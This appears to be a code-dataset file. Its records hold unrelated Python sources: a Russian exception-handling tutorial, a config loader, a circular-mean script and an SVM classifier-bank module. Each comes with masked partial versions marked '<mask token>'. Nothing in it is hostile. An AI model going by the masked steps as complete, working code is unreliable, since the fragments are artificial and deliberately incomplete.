"step-4": "# *** Обработка исключений (исключительные события, искл. ситуации)***\n\n# генерация исключения\na=100\nb=0\n\n# \"деление на ноль\" - пример ошибки (не рабочий)\n# c=a/b\n\n# решение - обработка исключений (отлов исключения)\n# конструкция \"try-except\"\n\n# try:\n# c = a / b\n# print(\"Все отлично\")\n# except:\n# # тут должен быть код, который срабатывает при исключительных ситуациях\n# # т.е. \"запасной\" код\n# print(\"Что-то пошло не так\")\n# c=a/1\n\n# # тут может быть код который выполняется после предыдущего блока\n# print(\"Result: \", c)\n\n\n# обработка множества исключений\n\n# result=None\n\n# try:\n# var = int(input(\"Введите число, но не ноль: \"))\n# result = 50/var\n# # обработка исключения конкретного типа (класса)\n# except ZeroDivisionError: # в данном примере тип исключения - ZeroDivisionError\n# print(\"Вы попытались поделить на ноль!\")\n# result=50/1\n# except ValueError as val_error: # в данном примере тип исключения - ValueError, \n# print(f\"По-моему, Вы ввели не число. Инфо: {val_error}\")\n# result=0\n\n# # обработка общего (базового) исключения - отлавливает все исключения\n# except Exception as err:\n# print(f\"Что-то пошло не так: {err}\")\n\n# print(\"Result: \", result)\n\n\n# конструкция \"try-except-finally\"\n\n# try:\n# var=int(input(\"Введите число: \"))\n# c = 100/var\n# print(\"Полет нормальный!\")\n# except ZeroDivisionError:\n# c=0\n# print(\"Попытка деления на ноль\")\n# finally:\n# # finally срабатывает в любом случае, даже если программа завершится аварийно\n# # т.е. тут должна быть критически важная логика\n# print(\"Критически важное действие\")\n\n# print(\"Result\", c)\n\n# конструкция \"try-except-finally\"\n\ntry:\n var=int(input(\"Введите число: \"))\n c = 100/var\n print(\"Полет нормальный!\")\nexcept ZeroDivisionError:\n c=0\n print(\"Попытка деления на ноль\")\nelse: \n #else срабатывает только тогда, когда нет исключений\n print(\"Логика, которая выполняется только если нет исключений\")\nfinally:\n # finally срабатывает в любом случае, даже если программа завершится аварийно\n # т.е. тут должна быть критически важная логика\n print(\"Критически важное действие\")\n\nprint(\"Result\", c)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import sys
from string import ascii_letters, digits
from ConfigParser import SafeConfigParser
import ConfigParser as configparser  # module alias so the except clause in load_config_file() can reference configparser.Error
# copied from utils, avoid circular reference fun :)
def mk_boolean(value):
if value is None:
return False
val = str(value)
if val.lower() in [ "true", "t", "y", "1", "yes" ]:
return True
else:
return False
def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
''' return a configuration variable with casting '''
value = _get_config(p, section, key, env_var, default)
if boolean:
return mk_boolean(value)
if value and integer:
return int(value)
if value and floating:
return float(value)
if value and islist:
return [x.strip() for x in value.split(',')]
return value
def _get_config(p, section, key, env_var, default):
''' helper function for get_config '''
if env_var is not None:
value = os.environ.get(env_var, None)
if value is not None:
return value
if p is not None:
try:
return p.get(section, key, raw=True)
except:
return default
return default
def load_config_file():
    ''' Load Config File order (first found is used): ENV, CWD, HOME, /etc/sojourner '''
p = SafeConfigParser()
path0 = os.getenv("SOJOURNER_CONFIG", None)
if path0 is not None:
path0 = os.path.expanduser(path0)
path1 = os.getcwd() + "/sojourner.cfg"
path2 = os.path.expanduser("~/.sojourner.cfg")
path3 = "/etc/sojourner/sojourner.cfg"
for path in [path0, path1, path2, path3]:
if path is not None and os.path.exists(path):
try:
p.read(path)
except configparser.Error as e:
print("Error reading config file: \n{0}".format(e))
sys.exit(1)
return p
return None
def shell_expand_path(path):
''' shell_expand_path is needed as os.path.expanduser does not work
when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''
if path:
path = os.path.expanduser(os.path.expandvars(path))
return path
p = load_config_file()
active_user = pwd.getpwuid(os.geteuid())[0]
# sections in config file
DEFAULTS='defaults'
# configurable things
# def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
DEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))
DEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')
DEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')
DEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')
DEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')
DEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')
DEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')
SOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')
# ANSIBLE RELATED
SOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')
# CHEF RELATED
SOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')
|
normal
|
{
"blob_id": "63bd8a15dd489844968f46c4b0ffe157d567537a",
"index": 8044,
"step-1": "<mask token>\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\n<mask token>\n",
"step-3": "<mask token>\n__metaclass__ = type\n<mask token>\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\np = load_config_file()\nactive_user = pwd.getpwuid(os.geteuid())[0]\nDEFAULTS = 'defaults'\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS,\n 'sojourner_home', 'DEFAULT_SOJOURNER_HOME', os.environ['HOME'] +\n '/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine',\n 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST',\n 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT',\n '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER',\n 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd',\n 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname',\n 'SOJOURNER_DB_DBNAME', 'sojourner')\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner',\n 'SOJOURNER_PROVISIONER', 'ansible')\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles',\n 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks',\n 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-4": "from __future__ import absolute_import, division, print_function\n__metaclass__ = type\nimport os\nimport pwd\nimport sys\nfrom string import ascii_letters, digits\nfrom ConfigParser import SafeConfigParser\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\np = load_config_file()\nactive_user = pwd.getpwuid(os.geteuid())[0]\nDEFAULTS = 'defaults'\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS,\n 'sojourner_home', 'DEFAULT_SOJOURNER_HOME', os.environ['HOME'] +\n '/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine',\n 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST',\n 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT',\n '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER',\n 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd',\n 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname',\n 'SOJOURNER_DB_DBNAME', 'sojourner')\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner',\n 'SOJOURNER_PROVISIONER', 'ansible')\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles',\n 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks',\n 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-5": "\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\nimport pwd\nimport sys\n\nfrom string import ascii_letters, digits\nfrom ConfigParser import SafeConfigParser\n\n# copied from utils, avoid circular reference fun :)\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in [ \"true\", \"t\", \"y\", \"1\", \"yes\" ]:\n return True\n else:\n return False\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):\n ''' return a configuration variable with casting '''\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\ndef _get_config(p, section, key, env_var, default):\n ''' helper function for get_config '''\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\ndef load_config_file():\n ''' Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner '''\n\n p = SafeConfigParser()\n\n path0 = os.getenv(\"SOJOURNER_CONFIG\", None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + \"/sojourner.cfg\"\n path2 = os.path.expanduser(\"~/.sojourner.cfg\")\n path3 = \"/etc/sojourner/sojourner.cfg\"\n\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print(\"Error reading config file: \\n{0}\".format(e))\n sys.exit(1)\n return p\n return None\n\ndef shell_expand_path(path):\n ''' shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\np = load_config_file()\n\nactive_user = pwd.getpwuid(os.geteuid())[0]\n\n# sections in config file\nDEFAULTS='defaults'\n\n# configurable things\n# \t\t\tdef get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')\n\n\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')\n\n# ANSIBLE RELATED\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\n\n# CHEF RELATED\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 11:14:13 2019
@author: dobri
"""
import numpy as np
from astropy.stats import circmean
x = np.multiply(np.pi,[(0,1/4,2/4,3/4,4/4),(1,5/4,6/4,7/4,8/4),(5/4,5/4,5/4,5/4,5/4),(0/5,2/5,4/5,6/5,8/5)])
s = np.shape(x)
phikprime = np.array(x*0, dtype=complex);
phikprimebar = np.zeros((s[1],1), dtype=complex)
phikbar = np.zeros((s[0],1))
rhok = np.zeros((s[0],1))
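# Each phase becomes a unit complex number; the row mean's angle is the circular mean and its magnitude the mean resultant length (rho).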
for j in range(0,len(x)):
for k in range(0,len(x[j,:])):
        phikprime[j,k]=complex(np.cos(x[j,k]),np.sin(x[j,k]))  # built-in complex; the np.complex alias has been removed from NumPy
phikprimebar[j] = np.sum(phikprime[j,:])/s[1]
phikbar[j] = np.angle(phikprimebar[j])
rhok[j] = np.absolute(phikprimebar[j])
print(phikbar[j],circmean(x[j,:]),rhok[j])
|
normal
|
{
"blob_id": "c35ecad842477fc8501a763f7eb972f6e7fc13e1",
"index": 7525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-3": "<mask token>\nx = np.multiply(np.pi, [(0, 1 / 4, 2 / 4, 3 / 4, 4 / 4), (1, 5 / 4, 6 / 4, \n 7 / 4, 8 / 4), (5 / 4, 5 / 4, 5 / 4, 5 / 4, 5 / 4), (0 / 5, 2 / 5, 4 / \n 5, 6 / 5, 8 / 5)])\ns = np.shape(x)\nphikprime = np.array(x * 0, dtype=complex)\nphikprimebar = np.zeros((s[1], 1), dtype=complex)\nphikbar = np.zeros((s[0], 1))\nrhok = np.zeros((s[0], 1))\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-4": "<mask token>\nimport numpy as np\nfrom astropy.stats import circmean\nx = np.multiply(np.pi, [(0, 1 / 4, 2 / 4, 3 / 4, 4 / 4), (1, 5 / 4, 6 / 4, \n 7 / 4, 8 / 4), (5 / 4, 5 / 4, 5 / 4, 5 / 4, 5 / 4), (0 / 5, 2 / 5, 4 / \n 5, 6 / 5, 8 / 5)])\ns = np.shape(x)\nphikprime = np.array(x * 0, dtype=complex)\nphikprimebar = np.zeros((s[1], 1), dtype=complex)\nphikbar = np.zeros((s[0], 1))\nrhok = np.zeros((s[0], 1))\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 11:14:13 2019\n\n@author: dobri\n\"\"\"\n\nimport numpy as np\nfrom astropy.stats import circmean\n\nx = np.multiply(np.pi,[(0,1/4,2/4,3/4,4/4),(1,5/4,6/4,7/4,8/4),(5/4,5/4,5/4,5/4,5/4),(0/5,2/5,4/5,6/5,8/5)])\ns = np.shape(x)\n\nphikprime = np.array(x*0, dtype=complex);\nphikprimebar = np.zeros((s[1],1), dtype=complex)\nphikbar = np.zeros((s[0],1))\nrhok = np.zeros((s[0],1))\n \nfor j in range(0,len(x)):\n for k in range(0,len(x[j,:])):\n phikprime[j,k]=np.complex(np.cos(x[j,k]),np.sin(x[j,k]))\n \n phikprimebar[j] = np.sum(phikprime[j,:])/s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j],circmean(x[j,:]),rhok[j])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
""" Version 3 of IRC (Infinite Recursive classifier). Based on the idea that each output is placed in a certain
location.
Let me try to solve a simpler problem first. Let me forget about the gate and do non stop recursive classification
step by step, one bye one.
Update. 19 May 2015. Let me step this up. Instead of having a fixed width,
Update. 21 May 2015: Split into files, created School.py
#TODO: extending classifier
let me keep expanding the width. Only the
Variable width output for classifier.
Assign any function to a classifier node.
input width is fixed.
# TODO Need a better predictor.
"""
__author__ = 'Abhishek Rao'
# Headers
import numpy as np
from sklearn import svm
import math
import matplotlib.pyplot as plt
import pickle
import os.path
from sklearn.metrics import accuracy_score
import School
# Constants
# Classes
class ClassifierNode:
""" A node that contains classifier, it's input address and output address.
"""
def __init__(self, end_in_address, out_address, classifier_name='Default',
given_predictor=None):
self.out_address = out_address
self.end_in_address = end_in_address # end column
self.label = classifier_name # The name of this concept. e.g. like apple etc.
# Check whether to create a standard classifier or a custom, given one.
if given_predictor:
self.given_predictor = given_predictor
self.classifier_type = 'custom'
else:
self.classifier = svm.LinearSVC(dual=False, penalty='l1')
self.classifier_type = 'standard'
def fit(self, x_in, y):
new_x_in = x_in[:, :self.end_in_address]
self.classifier.fit(new_x_in, y)
def predict(self, x_in):
"""
Give output for the current classifier. Note instead of predict 1,0, better to use probability, soft prediction.
:param x_in: The Classifier banks working memory, full matrix_in.
:return: A column of predicted values.
"""
new_x_in = x_in[:, :self.end_in_address]
if self.classifier_type == 'standard':
dec_fx_in = self.classifier.decision_function(new_x_in)
else:
dec_fx_in = self.given_predictor(new_x_in)
# Convert it into mapping between 0 to 1 instead of -1 to 1
return np.array([sigmoid_10(i) for i in dec_fx_in])
class SimpleClassifierBank:
""" A machine which stores both input X and the current output of bunch of classifiers.
API should be similar to scikit learn"""
def __init__(self, max_width, input_width, height):
"""
Initialize this class.
:rtype : object self
:param max_width: maximum data dimension in current working memory, should be greater than
input_width.
:param input_width: maximum input dimension.
:param height: maximum number of input samples
:return: None
"""
self.current_working_memory = np.zeros([height, max_width])
self.classifiers_out_address_start = input_width # the start of classifiers output.
self.classifiers_current_count = 0 # starting address for output for new classifier
self.classifiers_list = []
def predict(self, x_pred):
"""Give out what it thinks from the input. Input x_pred should be 2 dimensional.
:param: x_pred: input, dimension 2, (samples x_pred dimension)"""
self.current_working_memory *= 0 # Flush the current input
x_pred = np.array(x_pred)
input_number_samples, input_feature_dimension = x_pred.shape
        if len(x_pred.shape) != 2:
print "Error in predict. Input dimension should be 2"
raise ValueError
self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred
for classifier_i in self.classifiers_list:
predicted_value = classifier_i.predict(self.current_working_memory)
predicted_shape = predicted_value.shape
if len(predicted_shape) < 2:
predicted_value = predicted_value.reshape(-1, 1)
predicted_shape = predicted_value.shape
self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value
# need to return the rightmost nonzero column.
for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns
if np.any(self.current_working_memory[:input_number_samples, column_j]):
soft_dec = self.current_working_memory[:input_number_samples, column_j]
return np.array(soft_dec > 0.5, dtype=np.int16)
print 'Cant find any nonzero column'
return self.current_working_memory[:, 0]
def fit(self, x_in, y, task_name='Default'):
"""
Adds a new classifier and trains it, similar to Scikit API
:param x_in: 2d Input data
:param y: labels
:return: None
"""
# check for limit reach for number of classifiers.
if self.classifiers_current_count + self.classifiers_out_address_start \
> self.current_working_memory.shape[1]:
print 'No more space for classifier. ERROR'
raise MemoryError
x_in = np.array(x_in)
input_number_samples, input_feature_dimension = x_in.shape
        if len(x_in.shape) != 2:
print "Error in predict. Input dimension should be 2"
raise ValueError
self.current_working_memory[:x_in.shape[0], :x_in.shape[1]] = x_in
# Procure a new classifier, this might be wasteful, later perhaps reuse classifier
# instead of lavishly getting new ones, chinese restaurant?
new_classifier = ClassifierNode(
end_in_address=self.classifiers_out_address_start + self.classifiers_current_count,
out_address=[self.classifiers_out_address_start + self.classifiers_current_count + 1],
classifier_name=task_name)
self.classifiers_current_count += 1
# Need to take care of mismatch in length of working memory and input samples.
new_classifier.fit(self.current_working_memory[:input_number_samples], y)
self.classifiers_list.append(new_classifier)
def fit_custom_fx(self, custom_function, input_width, output_width, task_name):
"""
Push in a new custom function to classifiers list.
:param custom_function: The function that will be used to predict. Should take in a 2D array input and
give out a 2d array of same height and variable width.
:param input_width: The width of input.
:param output_width: The width of output. If a single neuron this is one.
:param task_name: name of this function
:return: None
"""
new_classifier = ClassifierNode(
end_in_address=input_width,
out_address=self.classifiers_out_address_start + self.classifiers_current_count + np.arange(output_width),
classifier_name=task_name,
given_predictor=custom_function
)
self.classifiers_current_count += output_width
self.classifiers_list.append(new_classifier)
def status(self):
"""Gives out the current status, like number of classifier and prints their values"""
print 'Currently there are ', len(self.classifiers_list), ' classifiers. They are'
classifiers_coefficients = np.zeros(self.current_working_memory.shape)
print [classifier_i.label for classifier_i in self.classifiers_list]
for count, classifier_i in enumerate(self.classifiers_list):
coeffs_i = classifier_i.classifier.coef_ \
if classifier_i.classifier_type == 'standard' else np.zeros([1, 1])
classifiers_coefficients[count, :coeffs_i.shape[1]] = coeffs_i
# print 'Classifier: ', classifier_i
# print 'Classifier name: ', classifier_i.label
# print 'Out address', classifier_i.out_address
# print 'In address', classifier_i.end_in_address
# print 'Coefficients: ', classifier_i.classifier.coef_, classifier_i.classifier.intercept_
plt.imshow(self.current_working_memory, interpolation='none', cmap='gray')
plt.title('Current working memory')
plt.figure()
plt.imshow(classifiers_coefficients, interpolation='none', cmap='gray')
plt.title('Classifier coefficients')
plt.show()
def remove_classifier(self, classifier_name):
"""
Removes the classifier whose name is same as classifier_name
:param classifier_name: the label of the classifier to be removed.
:return: the index of removed classifier. -1 if not found.
"""
try:
labels_list = [classifier_i.label for classifier_i in self.classifiers_list]
except ValueError:
print 'The specified label does not exist.'
return -1
removing_index = labels_list.index(classifier_name)
self.classifiers_list.pop(removing_index)
        print 'Classifier was removed. Its name was', classifier_name
return removing_index
def score(self, x_in, y):
"""
Gives the accuracy between predicted( x_in) and y
:param x_in: 2d matrix, samples x_in dimension
:param y: actual label
:return: float, between 0 to 1
"""
yp_score = self.predict(x_in)
return accuracy_score(y, y_pred=yp_score)
def generic_task(self, x_in, y, task_name):
"""
A generic framework to train on different tasks.
"""
self.fit(x_in, y, task_name=task_name)
print 'The score for task ', task_name, ' is ', self.score(x_in, y)
# Global functions
